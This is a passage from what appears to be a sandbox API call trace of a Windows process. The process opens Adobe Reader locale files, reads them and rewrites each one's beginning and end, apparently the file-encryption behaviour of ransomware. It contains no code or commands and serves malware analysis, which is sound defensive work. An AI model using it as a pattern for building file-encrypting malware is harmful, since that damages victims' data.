nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.498] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x65c00 [0081.499] WriteFile (in: hFile=0x1f0, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.500] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.500] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0081.500] CloseHandle (hObject=0x1f0) returned 1 [0081.501] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\EScript.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\escript.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.501] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.502] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x9e00 [0081.502] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.502] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.502] ReleaseMutex (hMutex=0x168) returned 1 [0081.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.EUQ", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0081.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.EUQ", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.EUQ", lpUsedDefaultChar=0x0) returned 11 [0081.502] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.560] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8e00 [0081.560] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.574] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8e00 [0081.574] WriteFile (in: hFile=0x1f0, lpBuffer=0x2694e18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2694e18*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.575] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.575] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.576] CloseHandle (hObject=0x1f0) returned 1 [0081.576] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\reflow.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\reflow.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.577] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.577] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1200 [0081.577] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.577] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.577] ReleaseMutex (hMutex=0x168) returned 1 [0081.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.EUQ", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.EUQ", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.EUQ", lpUsedDefaultChar=0x0) returned 10 [0081.577] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0081.592] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0081.592] WriteFile (in: hFile=0x1f0, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x331f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0081.592] CloseHandle (hObject=0x1f0) returned 1 [0081.592] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\WebLink.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\weblink.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.593] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.593] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6e00 [0081.594] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.594] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.594] ReleaseMutex (hMutex=0x168) returned 1 [0081.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WebLink.EUQ", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0081.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WebLink.EUQ", cchWideChar=11, lpMultiByteStr=0x1f735ac, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WebLink.EUQ", lpUsedDefaultChar=0x0) returned 11 [0081.594] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.608] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5e00 [0081.608] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.619] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5e00 [0081.620] WriteFile (in: hFile=0x1f0, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.621] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.621] WriteFile (in: hFile=0x1f0, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.621] CloseHandle (hObject=0x1f0) returned 1 [0081.621] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\DVA.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\dva.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.622] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.622] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4600 [0081.622] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.622] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.622] ReleaseMutex (hMutex=0x168) returned 1 [0081.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.SUO", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0081.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.SUO", cchWideChar=7, lpMultiByteStr=0x1f7abdc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.SUO", lpUsedDefaultChar=0x0) returned 7 [0081.623] ReadFile (in: hFile=0x1f0, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.639] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3600 [0081.639] ReadFile (in: hFile=0x1f0, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.648] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3600 [0081.649] WriteFile (in: hFile=0x1f0, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.649] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.649] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.649] CloseHandle (hObject=0x1f0) returned 1 [0081.650] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\RdLang32.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\rdlang32.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.650] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.650] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x144c00 [0081.650] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.650] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.650] ReleaseMutex (hMutex=0x168) returned 1 [0081.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.SUO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.SUO", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.SUO", lpUsedDefaultChar=0x0) returned 12 [0081.651] ReadFile (in: hFile=0x1f0, lpBuffer=0x28a3918, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0081.659] ReadFile (in: hFile=0x1f0, lpBuffer=0x28a3918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.667] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x143c00 [0081.667] ReadFile (in: hFile=0x1f0, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.680] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x143c00 [0081.680] WriteFile (in: hFile=0x1f0, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.681] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.681] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0081.681] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.681] CloseHandle (hObject=0x1f0) returned 1 [0081.682] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Spelling.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\spelling.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.682] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.682] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2a00 [0081.682] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.683] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.683] ReleaseMutex (hMutex=0x168) returned 1 [0081.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.SUO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.SUO", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.SUO", lpUsedDefaultChar=0x0) returned 12 [0081.683] ReadFile (in: hFile=0x1f0, lpBuffer=0x2666698, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2666698*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.693] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1a00 [0081.693] ReadFile (in: hFile=0x1f0, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.705] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1a00 [0081.705] WriteFile (in: hFile=0x1f0, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.705] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.705] WriteFile (in: hFile=0x1f0, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.705] CloseHandle (hObject=0x1f0) returned 1 [0081.706] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Checkers.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\checkers.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.706] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.706] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x20a00 [0081.706] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.706] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.706] ReleaseMutex (hMutex=0x168) returned 1 [0081.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.FRA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.FRA", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.FRA", lpUsedDefaultChar=0x0) returned 12 [0081.706] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a4048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0081.714] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1fa00 [0081.714] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.720] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1fa00 [0081.720] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.720] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.720] WriteFile (in: hFile=0x1f0, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0081.720] CloseHandle (hObject=0x1f0) returned 1 [0081.721] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\pddom.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\pddom.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.721] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.721] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2e00 [0081.721] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.721] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.722] ReleaseMutex (hMutex=0x168) returned 1 [0081.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.FRA", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0081.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.FRA", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.FRA", lpUsedDefaultChar=0x0) returned 9 [0081.722] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, 